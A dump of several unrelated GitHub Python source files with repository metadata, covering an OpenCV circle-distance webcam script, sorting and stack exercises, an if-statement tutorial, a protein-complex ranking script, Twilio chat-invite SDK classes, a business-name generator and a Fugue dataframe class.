e6998d8ffb85300a81359374b5728c9b906e869c | 53f69aed7fd50532913b2688dddadc285f0921a7 | /Parte5.py | d0731e14787f6d47f93df771d7795028b1e4fe58 | [] | no_license | gabrielmf1/RobotEntrega2 | 144c3ba9d486e66ef2660d90a455031259f321ae | ed43f647795c904d359cbc44799b6cb2139f948f | refs/heads/master | 2021-02-10T15:34:05.405128 | 2020-03-02T16:18:23 | 2020-03-02T16:18:23 | 244,395,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,785 | py | import cv2
import numpy as np
from math import acos, degrees, sqrt
# Start video capture from the default webcam at 640x480:
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
# Colour bounds for the two circle markers,
# in HSV (Hue, Saturation, Value):
lower_cyan = np.array([95, 90, 20])
upper_cyan = np.array([110, 255, 255])
lower_magenta = np.array([165, 100, 20])
upper_magenta = np.array([180, 255, 255])
# Returns an image containing the edges of the input image.
# sigma controls how far from the median the two Canny thresholds are placed.
def auto_canny(image, sigma=0.33):
    """Apply Canny edge detection with thresholds derived from the pixel median."""
    # compute the median of the single channel pixel intensities
    v = np.median(image)
    # apply automatic Canny edge detection using the computed median
    lower = int(max(0, (1.0 - sigma) * v))
    upper = int(min(255, (1.0 + sigma) * v))
    edged = cv2.Canny(image, lower, upper)
    # return the edged image
    return edged
# Estimate the distance between the sheet and the camera (pinhole model).
def dist_folha_camera(n, entre_circ=14, f=525):
    """Return the sheet-to-camera distance, in cm.

    n: apparent distance between the two circle centres, in pixels.
    entre_circ: real distance between the circle centres in cm
        (default 14; generalised from the original hard-coded constant).
    f: camera focal length in pixels (default 525; webcam calibration).
    Raises ZeroDivisionError when n is 0.
    """
    return f * entre_circ / n
# Euclidean distance between two points.
def dist_pontos(xa, ya, xb, yb):
    """Return the straight-line distance from (xa, ya) to (xb, yb)."""
    return sqrt((xb - xa) ** 2 + (yb - ya) ** 2)
# Main loop: grab frames, detect the two coloured circles, overlay distance/angle.
while True:
    # Grab one frame from the webcam:
    _, frame = cap.read()
    # Convert the frame to HSV:
    frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
    # Build a mask for each of the two colours:
    mask_cyan = cv2.inRange(frame_hsv, lower_cyan, upper_cyan)
    mask_magenta = cv2.inRange(frame_hsv, lower_magenta, upper_magenta)
    # Combine the two masks:
    mask_both = cv2.bitwise_or(mask_cyan, mask_magenta)
    # Apply the combined mask to the original frame to keep
    # the original colours:
    output = cv2.bitwise_and(frame, frame, mask=mask_both)
    # Convert the frame to grayscale:
    frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # Remove noise from the image:
    frame_blur = cv2.GaussianBlur(frame_gray,(5,5),0)
    # Extract the edges of the frame:
    edges = auto_canny(frame_blur)
    # Edges in colour (not used below; kept for debugging):
    edges_color = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
    circles = cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT, 2, 40, param1=100, param2=100, minRadius=5, maxRadius=60)
    # Check that at least one circle was found:
    if circles is not None:
        # Convert the (x, y) coordinates to integers:
        circles = np.round(circles[0, :]).astype("int")
        for (x, y, r) in circles:
            # Draw a ring around the circle
            cv2.circle(output, (x, y), r, (0, 255, 0), 4)
        # Draw a line between the first two circles
        if len(circles) == 2:
            # Take the coordinates of each circle:
            xa, ya, ra = circles[0]
            xb, yb, rb = circles[1]
            distancia = dist_pontos(xa, ya, xb, yb)
            # Compute the line's angle with the horizontal:
            # NOTE(review): raises ZeroDivisionError if the two centres coincide.
            angulo = acos(abs(xb - xa) / distancia)
            angulo = degrees(angulo)
            # Put the distance and angle on screen:
            font = cv2.FONT_HERSHEY_SIMPLEX
            cv2.putText(output, 'Distancia : {0:.2f}cm'.format(dist_folha_camera(distancia)), (0,25), font, 1, (255,255,255), 2, cv2.LINE_AA)
            cv2.putText(output, 'Angulo : {0:.2f} graus'.format(angulo), (0,60), font, 1, (255,255,255), 2, cv2.LINE_AA)
            # Draw the line between the two circles
            cv2.line(output, (xa, ya), (xb, yb), (255,0,0), 4)
    # Show the result:
    cv2.imshow("Output", output)
    # Press Q to leave the main loop:
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
# Close the windows and release the webcam:
cv2.destroyAllWindows()
cap.release()
"gabriel.miras.f@gmail.com"
] | gabriel.miras.f@gmail.com |
def selection_sort(aList):
    """Sort ``aList`` in place (ascending) with selection sort; returns None.

    O(n**2) comparisons — fine for teaching and small inputs.
    (Cleanup: Pythonic tuple swap instead of a temp variable, and the
    tracked minimum value collapsed into the index alone.)
    """
    n = len(aList)
    for i in range(n):
        # find the index of the smallest remaining element
        least = i
        for j in range(i + 1, n):
            if aList[j] < aList[least]:
                least = j
        # swap it into position i (no-op when least == i)
        aList[i], aList[least] = aList[least], aList[i]
# Quick demo: sorts the list in place, then prints [1, 5, 6, 7, 8].
list1 = [7,8,5, 1,6]
selection_sort(list1)
print(list1)
| [
"56678959+egsu20@users.noreply.github.com"
] | 56678959+egsu20@users.noreply.github.com |
9a0efd92897fe170fc7b6274f6a4b78de5ba4563 | 52bb00d5e9dd936fb11aff2adb8c6d0f94849dc8 | /Stack/stackBasics.py | 02a1d2f1f7c25c4d306af354705e6860c171694f | [] | no_license | anildhaker/DataStructures | 1c7815d2bb1dc9d8ebd51e1ec868df8260557519 | e333fa5b95ecfc08a036bbeadfc4244f64361d7d | refs/heads/master | 2020-04-24T14:07:44.240689 | 2019-11-24T21:21:03 | 2019-11-24T21:21:03 | 172,009,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 418 | py | # Creating Stack using Arrays
from sys import maxsize
def createStack():
    """Create and return a new, empty stack (a plain Python list)."""
    return []
def isEmpty(stack):
    """Return True when the stack contains no elements."""
    return not stack
def push(stack, item):
    # Push item onto the top of the stack (amortised O(1) list append).
    stack.append(item)
def pop(stack):
    """Pop and return the top item of the stack.

    On an empty stack, return the sentinel string str(-maxsize - 1)
    instead of raising IndexError (original tutorial behaviour).
    """
    if not stack:  # inlined emptiness check
        return str(-maxsize - 1)
    return stack.pop()
# Demo: push three values, then pop the top one (prints "30 popped from stack").
stack = createStack()
push(stack, str(10))
push(stack, str(20))
push(stack, str(30))
print(pop(stack) + " popped from stack")
| [
"anildhaker777@gmail.com"
] | anildhaker777@gmail.com |
f807ab26b6709ac4c4da5cd5a8fd8a42d2095e0d | 289aaefe2f78bde474ea082afe55054f14932be4 | /LearnPython3-master/14-各种if语句/test.py | f8ca0d1778a1946fc2b6debfc9952c9d347ba02f | [] | no_license | 13424010187/python | ed15dbad380164c846ef68692213dea7689b514e | aab8ba8565ed29e7d8b93d7ec3270fafb1294fe9 | refs/heads/master | 2023-07-17T07:57:47.694227 | 2021-08-15T09:57:06 | 2021-08-15T09:57:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | point = 5
# Demo 1: plain "if" (single branch):
# if point > 30:
#     print("MVP球星")

# Demo 2: if-else (two branches):
# if point > 20:
#     print("绝对球星")
# else:
#     print("未来球星")

# Demo 3: if-elif-else (three branches):
# if point > 30:
#     print("MVP球星")
# elif point >= 20:
#     print("绝对球星")
# else:
#     print("未来球星")

# Demo 4: if-elif-elif-else; with point = 5, the final else branch runs.
if point > 30:
    print("MVP球星")
elif point >= 20:
    print("绝对球星")
elif point >= 10:
    print("未来球星")
else:
print("普通球员") | [
"1393699623@qq.com"
] | 1393699623@qq.com |
e7d838441af4644f293ada41a9292abbeb913be1 | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/fifth/rank_2x9a_L.py | e66f7696ff621027b573962e362ee9ac48c79b60 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,204 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
# NOTE: all paths below are absolute paths on the author's HPC cluster.
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '2x9a.csv'
identifier = 'L'
thresholdCoef = 0.2  # features with |median coefficient| below this are dropped
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/fifth/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/fifth/ranks/'
pdbID = testFile[:4]
# Load the trained classifier for this identifier.
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
    clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
# Transpose so each row is one decoy's descriptor vector.
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Drop features with coefficients below threshold
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs = coefs[np.abs(coefs['coefficients']) < thresholdCoef]
dropList = list(coefs.index)
del coefs
df1.drop(dropList, axis = 1, inplace = True)
# Load the standard scaler that was fitted on the training data.
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
    scaler = pickle.load(g)
for i in range(len(df1)):
    # subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed.
    df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
    df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
    # Standardize input DF using the standard scaler used for training data.
    df2 = scaler.transform(df2)
    # Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
    predictions = clf.predict(df2)
    score = sum(predictions)
    scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
    result.to_csv(h)
| [
"tanemur1@msu.edu"
] | tanemur1@msu.edu |
07df1de62e44822f02261a1845d6b75aac9897f7 | 3f327d2654b85b922909925b9f475315d78f4652 | /Backend/lib/python3.6/site-packages/twilio/rest/ip_messaging/v1/service/channel/invite.py | 4b462d7f7cd71af4bee1ea50fb21314fbac28cac | [
"MIT"
] | permissive | brianwang1217/SelfImprovementWebApp | 8db45914027537aee9614f9d218c93cc08dc90f8 | 7892fc4ee5434307b74b14257b29a5f05a0a0dd7 | refs/heads/master | 2022-12-13T15:01:08.595735 | 2018-06-23T04:46:06 | 2018-06-23T04:46:06 | 137,548,289 | 1 | 1 | MIT | 2022-05-25T01:28:29 | 2018-06-16T02:48:52 | Python | UTF-8 | Python | false | false | 14,677 | py | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class InviteList(ListResource):
""" """
def __init__(self, version, service_sid, channel_sid):
"""
Initialize the InviteList
:param Version version: Version that contains the resource
:param service_sid: The service_sid
:param channel_sid: The channel_sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteList
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteList
"""
super(InviteList, self).__init__(version)
# Path Solution
self._solution = {
'service_sid': service_sid,
'channel_sid': channel_sid,
}
self._uri = '/Services/{service_sid}/Channels/{channel_sid}/Invites'.format(**self._solution)
def create(self, identity, role_sid=values.unset):
"""
Create a new InviteInstance
:param unicode identity: The identity
:param unicode role_sid: The role_sid
:returns: Newly created InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
data = values.of({
'Identity': identity,
'RoleSid': role_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return InviteInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
)
def stream(self, identity=values.unset, limit=None, page_size=None):
"""
Streams InviteInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode identity: The identity
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.chat.v1.service.channel.invite.InviteInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
identity=identity,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, identity=values.unset, limit=None, page_size=None):
"""
Lists InviteInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode identity: The identity
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.chat.v1.service.channel.invite.InviteInstance]
"""
return list(self.stream(
identity=identity,
limit=limit,
page_size=page_size,
))
def page(self, identity=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of InviteInstance records from the API.
Request is executed immediately
:param unicode identity: The identity
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
"""
params = values.of({
'Identity': identity,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return InvitePage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of InviteInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return InvitePage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a InviteContext
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
return InviteContext(
self._version,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a InviteContext
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
return InviteContext(
self._version,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.IpMessaging.V1.InviteList>'
class InvitePage(Page):
    """A single page of Invite results; builds InviteInstance objects from raw payloads."""

    def __init__(self, version, response, solution):
        """
        Initialize the InvitePage

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param service_sid: The service_sid
        :param channel_sid: The channel_sid

        :returns: twilio.rest.chat.v1.service.channel.invite.InvitePage
        :rtype: twilio.rest.chat.v1.service.channel.invite.InvitePage
        """
        super(InvitePage, self).__init__(version, response)

        # Path Solution
        self._solution = solution

    def get_instance(self, payload):
        """
        Build an instance of InviteInstance

        :param dict payload: Payload response from the API

        :returns: twilio.rest.chat.v1.service.channel.invite.InviteInstance
        :rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
        """
        return InviteInstance(
            self._version,
            payload,
            service_sid=self._solution['service_sid'],
            channel_sid=self._solution['channel_sid'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.IpMessaging.V1.InvitePage>'
class InviteContext(InstanceContext):
""" """
def __init__(self, version, service_sid, channel_sid, sid):
"""
Initialize the InviteContext
:param Version version: Version that contains the resource
:param service_sid: The service_sid
:param channel_sid: The channel_sid
:param sid: The sid
:returns: twilio.rest.chat.v1.service.channel.invite.InviteContext
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
"""
super(InviteContext, self).__init__(version)
# Path Solution
self._solution = {
'service_sid': service_sid,
'channel_sid': channel_sid,
'sid': sid,
}
self._uri = '/Services/{service_sid}/Channels/{channel_sid}/Invites/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a InviteInstance
:returns: Fetched InviteInstance
:rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return InviteInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
channel_sid=self._solution['channel_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the InviteInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete('delete', self._uri)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.IpMessaging.V1.InviteContext {}>'.format(context)
class InviteInstance(InstanceResource):
    """Instance representation of a channel invite resource."""

    def __init__(self, version, payload, service_sid, channel_sid, sid=None):
        """Initialize the InviteInstance

        :returns: twilio.rest.chat.v1.service.channel.invite.InviteInstance
        :rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
        """
        super(InviteInstance, self).__init__(version)

        # Marshal the raw REST payload; the two date fields are additionally
        # parsed from ISO-8601 strings into datetime objects.
        plain_fields = ('sid', 'account_sid', 'channel_sid', 'service_sid',
                        'identity', 'role_sid', 'created_by', 'url')
        self._properties = {field: payload[field] for field in plain_fields}
        self._properties['date_created'] = deserialize.iso8601_datetime(payload['date_created'])
        self._properties['date_updated'] = deserialize.iso8601_datetime(payload['date_updated'])

        # The context is built lazily by the _proxy property.
        self._context = None
        self._solution = {
            'service_sid': service_sid,
            'channel_sid': channel_sid,
            'sid': sid or self._properties['sid'],
        }

    @property
    def _proxy(self):
        """Generate an instance context for the instance, the context is capable of
        performing various actions. All instance actions are proxied to the context.

        :returns: InviteContext for this InviteInstance
        :rtype: twilio.rest.chat.v1.service.channel.invite.InviteContext
        """
        if self._context is None:
            self._context = InviteContext(
                self._version,
                service_sid=self._solution['service_sid'],
                channel_sid=self._solution['channel_sid'],
                sid=self._solution['sid'],
            )
        return self._context

    @property
    def sid(self):
        """:returns: The sid  :rtype: unicode"""
        return self._properties['sid']

    @property
    def account_sid(self):
        """:returns: The account_sid  :rtype: unicode"""
        return self._properties['account_sid']

    @property
    def channel_sid(self):
        """:returns: The channel_sid  :rtype: unicode"""
        return self._properties['channel_sid']

    @property
    def service_sid(self):
        """:returns: The service_sid  :rtype: unicode"""
        return self._properties['service_sid']

    @property
    def identity(self):
        """:returns: The identity  :rtype: unicode"""
        return self._properties['identity']

    @property
    def date_created(self):
        """:returns: The date_created  :rtype: datetime"""
        return self._properties['date_created']

    @property
    def date_updated(self):
        """:returns: The date_updated  :rtype: datetime"""
        return self._properties['date_updated']

    @property
    def role_sid(self):
        """:returns: The role_sid  :rtype: unicode"""
        return self._properties['role_sid']

    @property
    def created_by(self):
        """:returns: The created_by  :rtype: unicode"""
        return self._properties['created_by']

    @property
    def url(self):
        """:returns: The url  :rtype: unicode"""
        return self._properties['url']

    def fetch(self):
        """Fetch a InviteInstance

        :returns: Fetched InviteInstance
        :rtype: twilio.rest.chat.v1.service.channel.invite.InviteInstance
        """
        return self._proxy.fetch()

    def delete(self):
        """Deletes the InviteInstance

        :returns: True if delete succeeds, False otherwise
        :rtype: bool
        """
        return self._proxy.delete()

    def __repr__(self):
        """Provide a friendly representation.

        :returns: Machine friendly representation
        :rtype: str
        """
        context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
        return '<Twilio.IpMessaging.V1.InviteInstance {}>'.format(context)
| [
"talk2shreyas@gmail.com"
] | talk2shreyas@gmail.com |
2039803a336ed484c58bade739c91627e889e3ca | 343ea722bc3e8d8f31c379235dc2b7e377314ccf | /busi_namegen.py | 00cbd91994b65b59d075a15ca987daecd8c1e325 | [
"MIT"
] | permissive | ksu-is/Business-Name-Gen | 9a1e25707e186a973f144878d26e1cc177edc910 | e19d54cbe4c9dc6425dc1fa394cd674bccfe62e0 | refs/heads/master | 2020-08-30T12:14:47.978161 | 2019-12-16T01:18:08 | 2019-12-16T01:18:08 | 218,377,376 | 0 | 0 | null | 2019-10-29T20:27:55 | 2019-10-29T20:27:55 | null | UTF-8 | Python | false | false | 1,802 | py | import requests
import random
word_site = "https://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain"
response = requests.get(word_site)
WORDS = response.content.splitlines()
the_name=''
the_business=''
the_word=''
suggestions=''
number=0
def Name():
    """Prompt until the user types an alphabetic name, then append it to the_name."""
    global the_name
    while True:
        entered = input("What is your name(enter either First or Last Name) :")
        if entered.isalpha():
            the_name += entered
            break
        # Non-alphabetic input: complain and ask again.
        print("Please try to use letters from the alphabet!")
Name()
def busi():
    """Prompt until the user types an alphabetic business focus, append to the_business."""
    global the_business
    while True:
        # NOTE: the prompt text (including the "businesss" spelling) is kept
        # exactly as shipped, since it is user-visible runtime output.
        entered = input("What is your businesss centered around(Ex:Fishing,Clothes,Sports, etc):")
        if entered.isalpha():
            the_business += entered
            break
        print("Please try to use letters from the alphabet!")
busi()
def suggest():
    """Offer random candidate words until one is accepted for the business name.

    "yes" accepts the shown word; "maybe" banks it, and after five banked
    words the user is asked to pick one of them.
    """
    global the_word
    global suggestions
    global number
    for _ in WORDS:
        candidate = random.choice(WORDS).capitalize()
        print(candidate.decode('utf-8'))
        answer = input("Do you like the word that describes your business? (yes or no or maybe)")
        if answer == "yes":
            the_word += str(candidate.decode('utf-8'))
            break
        elif answer == "maybe":
            # Bank the word; once five are banked, let the user choose one.
            suggestions += str(candidate.decode('utf-8')) + "\n"
            number += 1
            if number == 5:
                print(suggestions, "\n")
                choice = input("Which one of the suggestions do you like?")
                if choice in suggestions:
                    the_word += choice
                    break
                else:
                    print("Type the word in the suggestions correctly!")
suggest()
print(the_name,"'s","new business name will be:",the_name,"'s",the_word,the_business)
| [
"noreply@github.com"
] | noreply@github.com |
245f6652f9ba5ff4ceaf3ca3474ff2ac846e80de | d0ea061adedf56bcac0863aa28c9ad3ea0c4e0e3 | /fugue/dataframe/dataframe_iterable_dataframe.py | f243fb7b0c488a82a05d319c6ed54d47d1f9a88d | [
"Apache-2.0"
] | permissive | datadevopscloud/fugue | 5962994c24e336587c5c13969cef50bf5253f7fb | 1eabdf81a4b6cd76195a2c366bb9d3688bcb6fb3 | refs/heads/master | 2023-04-12T12:41:54.796013 | 2021-05-17T04:07:25 | 2021-05-17T04:07:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,752 | py | from typing import Any, Dict, Iterable, List, Optional
import pandas as pd
import pyarrow as pa
from fugue.dataframe.array_dataframe import ArrayDataFrame
from fugue.dataframe.dataframe import DataFrame, LocalDataFrame, LocalUnboundedDataFrame
from fugue.exceptions import FugueDataFrameError, FugueDataFrameInitError
from triad import Schema, assert_or_throw
from triad.utils.iter import EmptyAwareIterable, make_empty_aware
class LocalDataFrameIterableDataFrame(LocalUnboundedDataFrame):
    """DataFrame that wraps an iterable of local dataframes

    :param df: an iterable of
      :class:`~fugue.dataframe.dataframe.DataFrame`. If any is not local,
      they will be converted to :class:`~fugue.dataframe.dataframe.LocalDataFrame`
      by :meth:`~fugue.dataframe.dataframe.DataFrame.as_local`
    :param schema: |SchemaLikeObject|, if it is provided, it must match the schema
      of the dataframes
    :param metadata: dict-like object with string keys, default ``None``
    :raises FugueDataFrameInitError: if the input is not compatible

    :Examples:
    .. code-block:: python

        def get_dfs(seq):
            yield IterableDataFrame([], "a:int,b:int")
            yield IterableDataFrame([[1, 10]], "a:int,b:int")
            yield ArrayDataFrame([], "a:int,b:str")

        df = LocalDataFrameIterableDataFrame(get_dfs())
        for subdf in df.native:
            subdf.show()

    :Notice:

    It's ok to peek the dataframe, it will not affect the iteration, but it's
    invalid to count.

    ``schema`` can be used when the iterable contains no dataframe. But if there
    is any dataframe, ``schema`` must match the schema of the dataframes.

    For the iterable of dataframes, if there is any empty dataframe, they will
    be skipped and their schema will not matter. However, if all dataframes
    in the interable are empty, then the last empty dataframe will be used to
    set the schema.
    """

    def __init__(  # noqa: C901
        self, df: Any = None, schema: Any = None, metadata: Any = None
    ):
        try:
            if isinstance(df, Iterable):
                self._native = make_empty_aware(self._dfs_wrapper(df))
                orig_schema: Optional[Schema] = None
                if not self._native.empty:
                    # Peeking does not consume the iterable (empty-aware wrapper).
                    orig_schema = self._native.peek().schema
            else:
                raise ValueError(
                    f"{df} is incompatible with LocalDataFrameIterableDataFrame"
                )
            # Reconcile the explicit schema argument with the observed schema.
            if orig_schema is None and schema is None:
                raise FugueDataFrameInitError(
                    "schema is not provided and the input is empty"
                )
            elif orig_schema is None and schema is not None:
                pass
            elif orig_schema is not None and schema is None:
                schema = orig_schema
            else:
                schema = Schema(schema) if not isinstance(schema, Schema) else schema
                assert_or_throw(
                    orig_schema == schema,
                    lambda: f"iterable schema {orig_schema} is different from {schema}",
                )
            super().__init__(schema, metadata)
        except FugueDataFrameError:
            raise
        except Exception as e:
            raise FugueDataFrameInitError from e

    def _dfs_wrapper(self, dfs: Iterable[DataFrame]) -> Iterable[LocalDataFrame]:
        last_empty: Any = None
        last_schema: Any = None
        yielded = False
        for df in dfs:
            if df.empty:
                # Empty frames are skipped; remember the last one in case
                # everything turns out to be empty.
                last_empty = df
            else:
                assert_or_throw(
                    last_schema is None or df.schema == last_schema,
                    lambda: FugueDataFrameInitError(
                        f"encountered schema {df.schema} doesn't match"
                        # BUG FIX: the message previously interpolated df.schema
                        # twice, hiding the schema it was actually compared to.
                        f" the original schema {last_schema}"
                    ),
                )
                if last_schema is None:
                    last_schema = df.schema
                yield df.as_local()
                yielded = True
        if not yielded and last_empty is not None:
            # All frames were empty: yield the last so a schema is available.
            yield last_empty

    @property
    def native(self) -> EmptyAwareIterable[LocalDataFrame]:
        """Iterable of dataframes"""
        return self._native

    @property
    def empty(self) -> bool:
        return self.native.empty or self.native.peek().empty

    def peek_array(self) -> Any:
        self.assert_not_empty()
        return self.native.peek().peek_array()

    def _select_cols(self, keys: List[Any]) -> DataFrame:
        if self.empty:
            return ArrayDataFrame([], self.schema)[keys]

        def _transform():
            for df in self.native:
                yield df[keys]

        return LocalDataFrameIterableDataFrame(_transform())

    def rename(self, columns: Dict[str, str]) -> DataFrame:
        if self.empty:
            return ArrayDataFrame([], self.schema).rename(columns)

        def _transform() -> Iterable[DataFrame]:
            for df in self.native:
                yield df.rename(columns)

        return LocalDataFrameIterableDataFrame(_transform())

    def alter_columns(self, columns: Any) -> DataFrame:
        if self.empty:
            return ArrayDataFrame([], self.schema).alter_columns(columns)

        def _transform() -> Iterable[DataFrame]:
            for df in self.native:
                yield df.alter_columns(columns)

        return LocalDataFrameIterableDataFrame(_transform())

    def as_array(
        self, columns: Optional[List[str]] = None, type_safe: bool = False
    ) -> List[Any]:
        return sum(
            (df.as_array(columns=columns, type_safe=type_safe) for df in self.native),
            [],
        )

    def as_array_iterable(
        self, columns: Optional[List[str]] = None, type_safe: bool = False
    ) -> Iterable[Any]:
        for df in self.native:
            yield from df.as_array_iterable(columns=columns, type_safe=type_safe)

    def as_pandas(self) -> pd.DataFrame:
        if self.empty:
            return ArrayDataFrame([], self.schema).as_pandas()
        return pd.concat(df.as_pandas() for df in self.native)

    def as_arrow(self, type_safe: bool = False) -> pa.Table:
        if self.empty:
            return ArrayDataFrame([], self.schema).as_arrow()
        return pa.concat_tables(df.as_arrow() for df in self.native)

    def _drop_cols(self, cols: List[str]) -> DataFrame:
        if self.empty:
            return ArrayDataFrame([], self.schema)._drop_cols(cols)

        def _transform() -> Iterable[DataFrame]:
            for df in self.native:
                yield df._drop_cols(cols)

        return LocalDataFrameIterableDataFrame(_transform())
| [
"noreply@github.com"
] | noreply@github.com |
